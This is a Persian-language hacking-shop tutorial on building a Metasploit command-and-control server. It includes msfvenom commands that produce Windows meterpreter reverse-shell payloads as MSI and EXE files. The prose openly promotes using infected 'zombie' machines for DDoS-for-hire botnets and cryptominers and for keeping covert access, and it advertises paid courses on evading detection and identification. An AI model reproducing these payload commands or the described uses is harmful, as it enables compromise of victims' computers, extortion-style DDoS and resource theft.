جستجو پیشرفته محصولات
0
سبد خرید خالی است.
ورود | ثبت نام
با ورود و یا ثبت نام در زیرزمین سایبری شما شرایط و قوانین استفاده از سرویس‌های سایت را می‌پذیرید.

آموزش ساخت C2 با متااسپلویت

تصویر مقاله آموزش ساخت c2 با متااسپلویت

به آموزش ساخت C2 با متااسپلویت خیلی خوش آمدید; در ادامه این آموزش هک با ما همراه باشید تا این مهارت ضروری برای هکرها, کرکرها و بدافزار نویس هارو باهم به صورت عملی پیش ببریم . در این آموزش ساخت C2 دو سیستم ویندوزی رو با استفاده از یک بد افزار آلوده میکنیم و توسط یک سرور به صورت Remote بر روی اونها کد اجرا میکنیم .

C2 چیست ؟

هکر کنترل کننده C2 متااسپلویت

C2 یا Command and Control سیستمی است که مهاجمان سایبری برای کنترل از راه دور دستگاه‌های آلوده (مثل کامپیوترها یا سرورها) استفاده می‌کنند. از طریق C2، مهاجم می‌تواند دستورات را به دستگاه‌های آلوده بفرستد، اطلاعات را جمع‌آوری کند یا حملات دیگری را انجام دهد. لازم به ذکر هست که ما به این سیستم های آلوده زامبی میگیم . اگر کامل تر میخواین در مورد بات نت و C2 بدونید این مطلب بات نت چیست رو مطالعه کنید.

آموزش ساخت C2 با متااسپلویت

متااسپلویت بزرگترین ابزار تست نفوذ جهان, یکی از قابلیت هایی که به ما ارائه میده یک C2 رایگان و کاربردی هست که برای درک عملکرد c2 و کنترل زامبی هاتون میتونه به شدت به کمک شما بیاد . در ادامه آموزش ساخت C2 با متااسپلویت رو به صورت ویدیویی به همراه هک عملی از 0 پیش میبریم .

				
					کد ساخت installer msi 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f msi -o shell.msi
				
			
				
					کد ساخت shell.exe 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
				
			

چرا باید ساخت C2 با متااسپلویت رو یادبگیریم ؟

نکته اول اینکه ساخت C2 با متااسپلویت کاملا رایگان هست و هر شخصی نسبت به نیازی که داره , استفاده متفاوتی هم از C2 میبره;  توجه داشته باشید که اگر خیلی کار بزرگی میخواین انجام بدید این آموزش میتونه هویت شمارو به خطر بندازه و تکنیک های حرفه ای تری هست برای مخفی کردن C2 و جلوگیری از شناسایی شدن c2 سرورتون پس فقط برای شروع و کارای روزمره عادیتون فعلا از این آموزش استفاده کنید و برای حرفه ای تر شدن از دوره ابزار های ضروری تست نفوذ ما استفاده کنید . در ادامه آموزش ساخت c2 با metasploit چند نمونه استفاده ای که میتونید ببرید رو قرار میدیم :

مطلب پیشنهادی:   آموزش اسکن آسیب پذیری ها با ابزار Nuclei | شکار آسیب پذیری

اولین اتفاقی که میفته کنترل زامبی ها براتون راحت میشه, دستتون خیلی باز میشه برای هک و ارتقا سطح دسترسیتون و و خوب کارای زیادی هم میتونید انجام بدید از جمله باتن نت برای دیداس ; شما میتونید یک سرویس دیداس با همین آموزش ایجاد کنید فقط کافیه که یک فایل دیداس رو انتقال بدید به سرور هاتون که روش انتقال فایل رو در ویدیوی آموزش ساخت C2 با متااسپلویت یادگرفتیم, و در زمان نیاز دستور حمله رو به سرور هاتون در 1 لحظه ارسال کنید و بومم .

شما میتونید ماینر روی تمامی سیستم هایی که هک میکنید اجرا کنید, فایل آپلود و دانلود کنید و … در واقع هر کاری که عادت دارید انجام بدید رو الان میتونید یکجا انجامش بدید و دسترسیتون رو حفظ کنید, زامبی هاتون رو زیرنظر داشته باشید; زامبی هارو کنترل کنید و …

C2 های محبوب مورد استفاده هکرها

بر اساس اطلاعات ارائه شده در MITRE ATT&CK، چندین C2 (Command and Control) محبوب وجود دارند که به طور گسترده توسط مهاجمان استفاده می‌شوند. برخی از آنها شامل موارد زیر هستند:

  1. Sliver: Sliver یک C2 مدرن و منبع باز است که توسط تیم‌های تست نفوذ و مهاجمان سایبری استفاده می‌شود. این ابزار قابلیت اجرای دستورات از راه دور، انتقال فایل‌ها و انجام تکنیک‌های پنهان‌سازی مانند استفاده از پروتکل‌های DNS و HTTP/S را دارد. همچنین، از رمزنگاری‌های پیشرفته مثل AES و TLS برای امنیت ارتباطات C2 بهره می‌برد.

  2. ShadowPad: ShadowPad یک ابزار C2 پیشرفته است که به طور خاص توسط گروه‌های APT (Advanced Persistent Threat) مانند APT41 استفاده می‌شود. این ابزار از پروتکل‌های HTTP، DNS و FTP برای ارتباط با سرور C2 استفاده می‌کند و می‌تواند داده‌ها را رمزنگاری کرده و از تکنیک‌های پنهان‌سازی پیچیده برای جلوگیری از شناسایی استفاده کند.

  3. Cobalt Strike: Cobalt Strike یکی از محبوب‌ترین چارچوب‌های C2 است که توسط مهاجمان و تیم‌های تست نفوذ استفاده می‌شود. این ابزار از پروتکل‌های مختلف مانند HTTP و HTTPS برای انتقال داده‌ها استفاده می‌کند و قابلیت‌هایی مانند ارسال و دریافت داده‌های حساس و کنترل از راه دور سیستم‌های آلوده را دارد.

مطلب پیشنهادی:   آموزش پیدا کردن پنل ادمین سایت برای هک و دیفیس + همه روش ها

استفاده از این C2 ها به دلیل ویژگی‌هایی مانند پنهان‌سازی پیشرفته، مدیریت متمرکز سیستم‌های آلوده و قابلیت انتقال فایل‌ها و اجرای دستورات از راه دور، بسیار مورد توجه قرار گرفته‌اند. اما تمام این C2 یا C&C ها رایگان نیستند و به همین دلیل ممکنه نیاز بشه که شما به سمت C2 های رایگانی مثل Empire و متااسپلویت بیاید تا کارتون راه بیفته ; ما در این آموزش ساخت C2 با متااسپلویت سعی کردیم تا جایی که میشه خیلی ساده شما رو با این مبحث به صورت عملی آشنا کنیم .

 
 

 

 

نتیجه گیری از آموزش ساخت C2 با متااسپلویت

هر شخصی که در دنیای تست نفوذ کار کنه اسم C2 به گوشش خواهد خورد و اگر ادعایی داشته باشه باید بتونه فورا یک C2 launch کنه و از راه دور به تعداد زیاد زامبی هاش دستور بده! برای مثال اگر یک فایل مخرب رو جایی قرار دادید ممکنه 10 ها زامبی کسب کنید و اینجا شما باید همرو با هم مدیریت کنید در واقع یک کنترلر باید داشته باشید که زامبی ها به حرفش گوش کنن و دستورات اربابشون که شما باشید رو اجرا کنن که این دستورات هر چیزی که باب میل هکر هست میتونه باشه .

 
 

 

 

درباره نویسنــده
نویسنده
کورش سنایی
نظرات کاربـــران
فاقد دیدگاه
دیدگاهی برای این مطلب ثبت نشده است. اولین دیدگاه را شما بنویسید.
ثبت دیدگاه
captcha
دوره های هک و امنیت
دوره آموزش ساخت Badusb
1,600,000 تومان
آموزش
جــدید
16
دانشجو
ابزارهای هک و امنیت
کرکر وردپرس
1,400,000
68%
449,700 تومان
آموزش
جــدید
5
دانشجو
1,499,000 تومان
100%
رضایت
23
دانشجو
دوره های هک و امنیت
دوره آموزشی Junior Hacker
3,485,000 تومان
100%
رضایت
147
دانشجو
دوره های هک و امنیت
دوره آموزشی Shodan(رایگان)
800,000 تومان
100%
رضایت
795
دانشجو
1,400,000 تومان
100%
رضایت
155
دانشجو